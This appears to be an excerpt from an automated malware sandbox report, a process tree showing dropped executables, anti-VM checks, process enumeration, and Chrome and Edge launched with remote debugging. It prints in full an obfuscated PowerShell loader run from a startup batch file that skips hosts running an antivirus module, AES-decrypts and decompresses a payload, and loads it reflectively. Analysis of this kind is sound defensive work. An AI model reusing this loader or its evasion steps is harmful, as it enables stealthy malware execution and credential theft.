                                  PID:4704
                              • C:\Users\Admin\AppData\Local\Temp\10001190101\goldik121212.exe
                                "C:\Users\Admin\AppData\Local\Temp\10001190101\goldik121212.exe"
                                7⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:3272
                                • C:\Users\Admin\AppData\Local\Temp\10001190101\goldik121212.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10001190101\goldik121212.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:4556
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 960
                                  8⤵
                                  • Program crash
                                  PID:4900
                              • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                                "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:4248
                                • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:5944
                              • C:\Users\Admin\AppData\Local\Temp\10001210101\capt1cha.exe
                                "C:\Users\Admin\AppData\Local\Temp\10001210101\capt1cha.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:5396
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  8⤵
                                  • Enumerates processes with tasklist
                                  PID:4544
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  8⤵
                                  • Enumerates processes with tasklist
                                  PID:4444
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  8⤵
                                  • Enumerates processes with tasklist
                                  PID:2408
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  8⤵
                                  • Enumerates processes with tasklist
                                  PID:5156
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  8⤵
                                  • Enumerates processes with tasklist
                                  PID:4868
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  8⤵
                                  • Enumerates processes with tasklist
                                  PID:540
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  8⤵
                                  • Enumerates processes with tasklist
                                  PID:5936
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  8⤵
                                  • Enumerates processes with tasklist
                                  PID:5132
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  8⤵
                                  • Enumerates processes with tasklist
                                  PID:4456
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  8⤵
                                  • Enumerates processes with tasklist
                                  PID:5860
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  8⤵
                                  • Enumerates processes with tasklist
                                  PID:4008
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  8⤵
                                  • Enumerates processes with tasklist
                                  PID:3348
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  8⤵
                                  • Enumerates processes with tasklist
                                  PID:2988
                                  • C:\Windows\System32\Conhost.exe
                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    9⤵
                                      PID:540
                                  • C:\Windows\system32\tasklist.exe
                                    "tasklist"
                                    8⤵
                                    • Enumerates processes with tasklist
                                    PID:2588
                                  • C:\Windows\system32\tasklist.exe
                                    "tasklist"
                                    8⤵
                                    • Enumerates processes with tasklist
                                    PID:2352
                                  • C:\Windows\system32\tasklist.exe
                                    "tasklist" /FO CSV /NH
                                    8⤵
                                    • Enumerates processes with tasklist
                                    PID:752
                                  • C:\Windows\system32\taskkill.exe
                                    "taskkill" /F /IM msedge.exe
                                    8⤵
                                    • Kills process with taskkill
                                    PID:1980
                                • C:\Users\Admin\AppData\Local\Temp\10001220101\setup.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10001220101\setup.exe"
                                  7⤵
                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:5384
                            • C:\Users\Admin\AppData\Local\Temp\1075840001\BwStzYG.exe
                              "C:\Users\Admin\AppData\Local\Temp\1075840001\BwStzYG.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:1480
                            • C:\Users\Admin\AppData\Local\Temp\1075841001\PNYmoTn.exe
                              "C:\Users\Admin\AppData\Local\Temp\1075841001\PNYmoTn.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              PID:4500
                              • C:\Users\Admin\AppData\Local\Temp\1075841001\PNYmoTn.exe
                                "C:\Users\Admin\AppData\Local\Temp\1075841001\PNYmoTn.exe"
                                6⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4844
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 948
                                6⤵
                                • Program crash
                                PID:4984
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1075842041\tYliuwV.ps1"
                              5⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Drops startup file
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2560
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
                                6⤵
                                • System Location Discovery: System Language Discovery
                                PID:1408
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1192
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  7⤵
                                  • Blocklisted process makes network request
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:672
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                    8⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:3016
                            • C:\Users\Admin\AppData\Local\Temp\1075843001\Bjkm5hE.exe
                              "C:\Users\Admin\AppData\Local\Temp\1075843001\Bjkm5hE.exe"
                              5⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Checks processor information in registry
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2644
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                6⤵
                                • Uses browser remote debugging
                                • Enumerates system info in registry
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                • Suspicious use of FindShellTrayWindow
                                PID:1988
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffa5d53cc40,0x7ffa5d53cc4c,0x7ffa5d53cc58
                                  7⤵
                                    PID:4032
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2052,i,18256696141957365561,17903319004753716612,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=2044 /prefetch:2
                                    7⤵
                                      PID:2392
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1876,i,18256696141957365561,17903319004753716612,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=2152 /prefetch:3
                                      7⤵
                                        PID:4944
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2256,i,18256696141957365561,17903319004753716612,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=2312 /prefetch:8
                                        7⤵
                                          PID:4912
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,18256696141957365561,17903319004753716612,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=3192 /prefetch:1
                                          7⤵
                                          • Uses browser remote debugging
                                          PID:4264
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,18256696141957365561,17903319004753716612,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=3324 /prefetch:1
                                          7⤵
                                          • Uses browser remote debugging
                                          PID:4528
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4224,i,18256696141957365561,17903319004753716612,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=4260 /prefetch:2
                                          7⤵
                                          • Uses browser remote debugging
                                          PID:5116
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4680,i,18256696141957365561,17903319004753716612,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=4652 /prefetch:1
                                          7⤵
                                          • Uses browser remote debugging
                                          PID:2980
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4944,i,18256696141957365561,17903319004753716612,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=4936 /prefetch:8
                                          7⤵
                                            PID:1840
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4904,i,18256696141957365561,17903319004753716612,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=4472 /prefetch:8
                                            7⤵
                                              PID:1676
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5084,i,18256696141957365561,17903319004753716612,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=4472 /prefetch:8
                                              7⤵
                                                PID:5812
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5176,i,18256696141957365561,17903319004753716612,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=5188 /prefetch:8
                                                7⤵
                                                  PID:5888
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                6⤵
                                                • Uses browser remote debugging
                                                • Enumerates system info in registry
                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                • Suspicious use of FindShellTrayWindow
                                                PID:6120
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7ffa5d5446f8,0x7ffa5d544708,0x7ffa5d544718
                                                  7⤵
                                                  • Checks processor information in registry
                                                  • Enumerates system info in registry
                                                  PID:2348
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,1623491440308010442,6580130740812649807,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
                                                  7⤵
                                                    PID:5260
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,1623491440308010442,6580130740812649807,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3
                                                    7⤵
                                                      PID:5228
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,1623491440308010442,6580130740812649807,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
                                                      7⤵
                                                        PID:6132
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,1623491440308010442,6580130740812649807,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
                                                        7⤵
                                                        • Uses browser remote debugging
                                                        PID:3976
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,1623491440308010442,6580130740812649807,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
                                                        7⤵
                                                        • Uses browser remote debugging
                                                        PID:4384
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,1623491440308010442,6580130740812649807,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
                                                        7⤵
                                                          PID:3808
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,1623491440308010442,6580130740812649807,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
                                                          7⤵
                                                            PID:5392
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,1623491440308010442,6580130740812649807,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2848 /prefetch:2
                                                            7⤵
                                                              PID:5184
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,1623491440308010442,6580130740812649807,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2752 /prefetch:2
                                                              7⤵
                                                                PID:5344
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,1623491440308010442,6580130740812649807,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3544 /prefetch:2
                                                                7⤵
                                                                  PID:4472
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,1623491440308010442,6580130740812649807,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2792 /prefetch:2
                                                                  7⤵
                                                                    PID:2760
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,1623491440308010442,6580130740812649807,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3672 /prefetch:2
                                                                    7⤵
                                                                      PID:3328
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,1623491440308010442,6580130740812649807,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3796 /prefetch:2
                                                                      7⤵
                                                                        PID:4488
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                      6⤵
                                                                      • Uses browser remote debugging
                                                                      • Enumerates system info in registry
                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      PID:4088
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffa5d5446f8,0x7ffa5d544708,0x7ffa5d544718
                                                                        7⤵
                                                                        • Checks processor information in registry
                                                                        • Enumerates system info in registry
                                                                        PID:5976
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13928755109970674369,3807153889931469808,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2
                                                                        7⤵
                                                                          PID:6020
